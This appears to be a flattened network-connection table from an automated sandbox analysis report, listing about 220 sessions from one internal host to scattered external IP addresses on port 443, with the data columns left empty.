                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20509192.168.2.1539938213.211.206.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20510192.168.2.1548730181.99.180.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20511192.168.2.154222460.35.54.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20512192.168.2.155023486.173.118.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20513192.168.2.1540298209.110.42.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20514192.168.2.1538864202.42.119.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20515192.168.2.1538622211.108.154.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20516192.168.2.155830834.26.160.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20517192.168.2.1535192129.86.163.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20518192.168.2.1552970141.187.154.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20519192.168.2.1556238197.165.134.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20520192.168.2.154001881.238.85.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20521192.168.2.155852287.247.230.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20522192.168.2.1560652138.15.126.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20523192.168.2.155280091.183.157.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20524192.168.2.155415650.42.141.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20525192.168.2.1539884149.83.180.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20526192.168.2.153754638.14.14.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20527192.168.2.154096276.87.120.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20528192.168.2.15608942.39.35.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20529192.168.2.155163071.45.74.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20530192.168.2.1556208159.36.113.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20531192.168.2.154386248.123.34.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20532192.168.2.1547436102.210.254.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20533192.168.2.153858670.138.161.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20534192.168.2.1552980137.40.166.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20535192.168.2.155804835.183.83.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20536192.168.2.1552910161.27.198.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20537192.168.2.1548114148.153.95.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20538192.168.2.1547034184.70.57.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20539192.168.2.1536142154.253.76.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20540192.168.2.153460475.237.147.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20541192.168.2.1549170159.191.69.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20542192.168.2.1545666219.143.11.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20543192.168.2.1539948124.157.88.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20544192.168.2.156080068.42.0.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20545192.168.2.153574686.139.186.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20546192.168.2.1551172187.224.204.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20547192.168.2.1553314171.147.200.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20548192.168.2.1547876164.149.167.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20549192.168.2.155825673.111.168.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20550192.168.2.1557770148.208.170.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20551192.168.2.1538448143.158.246.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20552192.168.2.1558572194.13.17.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20553192.168.2.15433924.170.202.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20554192.168.2.154353619.242.198.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20555192.168.2.1542418147.235.208.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20556192.168.2.155765253.55.161.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20557192.168.2.153512868.26.14.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20558192.168.2.1552658101.221.137.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20559192.168.2.1539176177.143.141.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20560192.168.2.1534880157.226.86.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20561192.168.2.1549992132.79.253.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20562192.168.2.155602659.141.246.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20563192.168.2.154264894.114.212.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20564192.168.2.1548934187.108.131.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20565192.168.2.1550112142.190.1.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20566192.168.2.1536740175.213.222.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20567192.168.2.155652442.183.45.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20568192.168.2.155583287.149.62.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20569192.168.2.1555834174.144.109.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20570192.168.2.153465468.166.246.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20571192.168.2.1536936192.24.116.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20572192.168.2.1555750137.66.158.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20573192.168.2.1556012205.75.246.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20574192.168.2.154713654.65.8.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20575192.168.2.1536802181.31.134.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20576192.168.2.1550196189.111.219.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20577192.168.2.1536372157.71.59.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20578192.168.2.1536536153.113.225.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20579192.168.2.1558520159.14.89.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20580192.168.2.154366668.122.53.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20581192.168.2.1557114123.238.197.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20582192.168.2.1552072162.8.56.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20583192.168.2.154235649.23.14.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20584192.168.2.153955657.8.222.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20585192.168.2.1537832155.32.231.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20586192.168.2.153690071.33.200.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20587192.168.2.1545316177.27.57.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20588192.168.2.15422502.6.16.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20589192.168.2.154936834.249.29.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20590192.168.2.153962639.26.222.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20591192.168.2.1537912146.68.202.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20592192.168.2.1546944177.98.112.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20593192.168.2.15575505.150.70.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20594192.168.2.1535268152.15.13.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20595192.168.2.155044085.31.217.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20596192.168.2.154260898.85.32.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20597192.168.2.154907696.74.105.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20598192.168.2.154183450.187.125.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20599192.168.2.155519887.112.119.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20600192.168.2.154583831.20.47.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20601192.168.2.155337076.53.204.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20602192.168.2.153965867.59.211.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20603192.168.2.1553472157.182.67.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20604192.168.2.154276225.152.62.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20605192.168.2.1539736104.239.48.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20606192.168.2.1543072186.42.32.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20607192.168.2.1547276165.115.28.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20608192.168.2.153956446.213.63.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20609192.168.2.1535184182.107.173.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20610192.168.2.1547696116.189.168.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20611192.168.2.153958824.196.63.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20612192.168.2.1542660170.111.111.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20613192.168.2.154072651.79.175.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20614192.168.2.1538362125.251.140.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20615192.168.2.155028268.237.133.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20616192.168.2.1544036151.98.126.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20617192.168.2.1536476207.110.105.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20618192.168.2.1535662193.198.198.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20619192.168.2.1539504195.206.98.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20620192.168.2.1537862117.246.49.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20621192.168.2.1544568179.76.186.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20622192.168.2.1560232149.78.192.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20623192.168.2.1533476221.58.55.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20624192.168.2.155386492.206.220.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20625192.168.2.1540578144.193.7.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20626192.168.2.1532998142.196.51.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20627192.168.2.1536026181.126.6.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20628192.168.2.1550278148.242.155.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20629192.168.2.153458693.22.99.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20630192.168.2.154604661.203.135.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20631192.168.2.1549610158.175.20.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20632192.168.2.155192454.158.53.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20633192.168.2.155530241.25.99.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20634192.168.2.154355661.2.152.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20635192.168.2.1538158177.83.51.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20636192.168.2.1535756186.79.249.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20637192.168.2.156072838.66.16.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20638192.168.2.1559448204.128.19.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20639192.168.2.1550014209.247.205.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20640192.168.2.153788080.211.48.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20641192.168.2.1551786162.178.127.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20642192.168.2.1558518107.107.194.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20643192.168.2.154084441.64.65.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20644192.168.2.153588214.204.16.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20645192.168.2.1540382210.54.221.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20646192.168.2.154162025.51.183.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20647192.168.2.154481014.62.229.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20648192.168.2.1534414164.237.113.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20649192.168.2.1547090151.194.163.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20650192.168.2.153317020.55.32.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20651192.168.2.15603222.127.109.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20652192.168.2.1546362138.5.92.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20653192.168.2.1540200208.156.154.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20654192.168.2.1546718187.245.81.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20655192.168.2.1535900203.94.29.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20656192.168.2.155574097.218.49.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20657192.168.2.154906619.30.136.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20658192.168.2.153811867.204.94.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20659192.168.2.1547718172.122.155.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20660192.168.2.1546344114.183.116.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20661192.168.2.155546631.254.214.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20662192.168.2.1534782120.210.123.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20663192.168.2.155474869.254.193.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20664192.168.2.1544842185.92.105.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20665192.168.2.1542410104.187.91.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20666192.168.2.1543422208.43.214.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20667192.168.2.155868041.119.112.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20668192.168.2.154799870.157.51.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20669192.168.2.1535290132.51.13.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20670192.168.2.1560182124.117.181.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20671192.168.2.15584844.100.143.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20672192.168.2.1559310203.2.120.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20673192.168.2.1536150147.255.128.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20674192.168.2.154262479.66.81.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20675192.168.2.1533914105.107.31.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20676192.168.2.153917263.118.81.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20677192.168.2.1549102109.1.23.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20678192.168.2.153427481.216.245.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20679192.168.2.155894694.248.218.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20680192.168.2.153969473.66.50.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20681192.168.2.154713491.90.119.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20682192.168.2.1534576189.238.211.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20683192.168.2.1550052205.229.131.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20684192.168.2.153317074.9.171.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20685192.168.2.1551556198.112.39.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20686192.168.2.1537080109.211.100.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20687192.168.2.154518420.236.212.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20688192.168.2.1554020140.16.182.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20689192.168.2.1535326151.68.68.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20690192.168.2.1535000165.109.29.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20691192.168.2.1540810197.61.106.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20692192.168.2.1540862121.183.218.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20693192.168.2.1535340220.75.107.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20694192.168.2.155237442.1.14.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20695192.168.2.155064851.189.53.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20696192.168.2.1536146122.110.255.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20697192.168.2.1554674211.197.37.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20698192.168.2.1552266213.160.143.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20699192.168.2.155162261.229.7.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20700192.168.2.155893497.248.66.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20701192.168.2.155732451.60.66.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20702192.168.2.1554382151.64.53.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20703192.168.2.1542998120.69.171.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20704192.168.2.154613480.187.108.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20705192.168.2.1557668197.32.104.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20706192.168.2.1533204130.26.103.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20707192.168.2.1534810165.219.107.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20708192.168.2.1554840151.220.178.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20709192.168.2.155883813.72.111.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20710192.168.2.1539474140.254.165.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20711192.168.2.154566684.203.45.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20712192.168.2.1533476205.238.116.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20713192.168.2.154989012.10.123.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20714192.168.2.154528281.161.167.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20715192.168.2.1552688137.29.233.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20716192.168.2.1534588136.86.252.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20717192.168.2.1560508134.154.253.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20718192.168.2.153972089.19.217.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20719192.168.2.1540214197.50.108.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20720192.168.2.155883491.129.142.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20721192.168.2.156059279.82.12.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20722192.168.2.1538644107.41.41.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20723192.168.2.1536698150.151.75.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20724192.168.2.1557104160.97.219.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20725192.168.2.154617293.15.87.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20726192.168.2.1539778120.195.130.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20727192.168.2.1558586122.13.158.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20728192.168.2.156002825.254.103.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20729192.168.2.1556428137.59.152.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20730192.168.2.1544256111.184.118.173443
